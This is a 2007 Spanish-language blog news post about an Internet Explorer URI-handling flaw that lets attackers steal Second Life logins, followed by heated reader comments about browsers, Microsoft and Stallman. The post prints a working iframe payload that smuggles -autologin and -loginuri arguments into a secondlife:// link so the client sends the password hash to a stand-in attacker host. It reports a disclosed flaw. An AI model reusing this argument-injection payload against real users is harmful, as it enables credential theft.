Robo de identidades en Second Life mediante Explorer

Enviado por admin el 16. Septiembre 2007 - 19:28.

Según acaba de publicar GNU Citizen (y confirma Sergio Maone, creador de NoScript), nuestro viejo amigo el bug "compartido" (sí, ése sobre el que un preclaro MVP de Microsoft asegura que esta empresa no tiene ninguna responsabilidad) permite que te roben impunemente tu "existencia" en Second Life, un mundo virtual... donde también se hacen negocios reales.

Tan sencillo como hacer que la víctima visite con Explorer una página maliciosa con el siguiente contenido:

<iframe src='secondlife://" -autologin -loginuri
"http://web.atacante.com/sl/record-login.php'>
</iframe>

Se provoca así el arranque del cliente de Second Life, que intenta loguearse automáticamente en la web del atacante. Un script situado en ésta recoge el hash MD5 de la contraseña, que puede ser utilizado directamente para loguearse, o bien pasarse por unas rainbow tables para extraer la contraseña en claro...

Maone lamenta (quizás irónicamente) que esta vez, al tratarse de Explorer, NoScript no pueda protegernos.

 

Fuente:

 

»

Comentarios

Selecciona arriba tu forma preferida de visualizar
los comentarios y pulsa el botón para guardar tus
preferencias. Éstas sólo se recordarán para tus
próximas visitas si eres usuario registrado.

basta

Enviado por ICeman el 16. Septiembre 2007 - 21:27.

Basta, me cansé. Estamos en el 2007 y hay gente que todavía navega con Internet Explorer. ¡Que se jodan! Hace por lo menos 5 años que "la comunidad" venimos abogando por el uso de navegadores seguros.

Así como "el que quiera entender que entienda" hagamos "el que quiera estar seguro que lo esté" y el que quiera llenarse de virus y que le usurpen la identidad tiene Windows con Internet Explorer. Cada cosa en su lugar.

PD: si yo fuera responsable de producto en MS o pongo Opera/Firefox de fábrica en lugar del explorer o me pego un tiro; a esta altura del partido son las únicas opciones dignas para los trabajadores de tal empresa.

Navegadores seguros?

Enviado por anónimo el 16. Septiembre 2007 - 22:22.

Hablas de IExplorer como si fuera el unico que tenga errores. Pues chico, firefox ha tenido sus epocas negras en cuanto a errores criticos sin solucionar.

Pero como el firefox es libre, es seguro, no? ja.

No es el único con fallos, no...

Enviado por anónimo el 16. Septiembre 2007 - 23:24.

... pero sí es el único cuyo fabricante (Microsoft) se niega a reconocerlos y a repararlos:

http://www.kriptopolis.org/arrieros-somos

De aquellos polvos, estos lodos.

Pos vale...

Enviado por anónimo el 17. Septiembre 2007 - 9:06.

Es una actitud estupenda... Si usas Windows es porque eres tonto, si usas Explorer eres ya tonto profundo... y te mereces todo lo que te pase...

Pues muy bien, asi se va a conseguir la proliferacion del software libre, insultando y tratando a los que no lo usan como si fueran idiotas, como estrategia comercial es arriesgada, no se quiza funcione...

Luego resulta que Microsoft es el demonio y lo hace todo mal. Pues visto lo visto, al menos en algo son mas listos, no tratan a los que no usan su S.O o navegador como si fueran imbeciles...

PD: Pues yo estoy hasta las mismas narices de Linuxeros toca narices que se creen dioses de la informatica y me van jod... la red cada 2 por 3 por hacer barbaridades.

Te equivocas

Enviado por anónimo el 17. Septiembre 2007 - 9:11.

Pues visto lo visto, al menos en algo son mas listos, no tratan a los que no usan su S.O o navegador como si fueran imbeciles...

Ahí te equivocas. Microsoft ya lo hizo.

como estrategia comercial es arriesgada, no se quiza funcione...

A Microsoft le ha funcionado. De hecho su éxito se basa en tratar a los usuarios como estúpidos.

Pos no

Enviado por anónimo el 17. Septiembre 2007 - 9:26.

No, no me equivoco por que:

A) la opinion de un individuo, no expresa la de una compañia, me consta que tuvo que pedir disculpas...

B) Habla de todo el mundo en general, no de los que usan este o aquel sistema operativo.

C) Particularmente, ademas, estoy de acuerdo con el.

Respecto al segundo punto, no todo el mundo tiene que ser un "guru" de la informatica como tu, de hecho no lo suelen ser, Microsoft trata de simplificar las cosas para gente que le importa un pimiento que es Linux y el Software libre, ESO es lo que les funciona...

Ah, ya entiendo...

Enviado por anónimo el 17. Septiembre 2007 - 9:36.

la opinion de un individuo, no expresa la de una compañia

Como el Espíritu Santo, Microsoft es una entidad celestial que está por encima de los falibles humanos. Ninguna opinión de sus directivos es la de la empresa, sólo William Gates es el Papa infalible y omniscente.

No, no creo que entiendas...

Enviado por anónimo el 18. Septiembre 2007 - 9:00.

Tu que trabajas en una charcuteria?, o directamente no trabajas...

Ni entidad celestial ni gaitas... no creo que sea tan dificil de entender que una persona, por muy directivo que sea, no marca o define de forma exclusiva la imagen u opinion corporativa de una marca o empresa.

Pero vamos, volviendo al punto de origen, yo uso IE desde siempre, por tanto debo ser estupido, estupido y con suerte... por que hasta la fecha, ni me han robado contraseñas ni he caido en un phising ni nada de nada...

Claro, a lo mejor es por que no me meto en una web que me llega por mail, o no me instalo cien mil barritas para el explorador, o lo mismo es por que rezo todas las noches a san Billy no te digo...

Si una persona recibe un correo instandole a entrar en esta o aquella web y entra, ya puede tener IE, Firefox, Netscape, Mozilla o lo que le de la gana que se la van a liar... es asi de simple.

Demonio?

Enviado por anónimo el 17. Septiembre 2007 - 9:40.

no estoy de acuerdo en que Microsoft sea "el demonio".

esa figura les cuadra mejor a los defensores del software libre, liderados por el anticristo Stallman, pro-comunistas y rompedores de las familias.

Microsoft sería más comparable con la iglesia oficial, siempre apegada al poder y los poderosos, disfrutando sus favores y liderada por el Mesías Gates.

No hay nada heterodoxo ni malvado en Microsoft. Todo lo contrario: representa como nadie el satus quo capitalista y bienpensante.

Mejor Gates que Stallman

Enviado por anónimo el 17. Septiembre 2007 - 11:08.

Stallman representa el arquetipo negativo del progre: el que vive de subvenciones que cobra por decir a los demás lo que deben de hacer, sin importar lo más mínimo que lo que dice sean estupideces: "que los programadores de GNU/Linux trabajen en un McDonald o en cualquier sitio para pagar las facturas, pero que no hagan software propietario".

Stallman no sé si será comunista o rompe familias (desde luego no creo que haya roto muchos matrimonios gracias a su gran belleza física), pero que es un iluminado desagradable y que resultaría peligroso si alguien le hiciera caso, es indudable.

En mi opinión William Gates aventaja mucho a Stallman en responsabilidad, dignidad, honestidad, decencia y respetabilidad.

1234siguientefinal

Opinar

Los comentarios publicados en este sitio expresan sólo la opinión de su autor, quien será el único responsable de los mismos. La publicación de cualquier comentario no supone en absoluto la conformidad del responsable de este sitio con su contenido.

Como norma general, en este sitio no se publican comentarios que incluyan datos personales, ni direcciones de correo, ni ninguna otra forma de establecer contactos privados o comerciales, así como comentarios que no aportan nada, fuera de tema o que no se ajustan a la netiqueta, la ortografía o la educación.

Para poder enviar tus comentarios has de permitir las cookies del sitio.

Por favor, escribe arriba el resultado de la operación planteada. Gracias.
  • Etiquetas HTML permitidas: <a> <em> <strong> <ul> <ol> <li> <p> <u> <br><strike> <blockquote> <div>

Más información sobre las opciones de formato...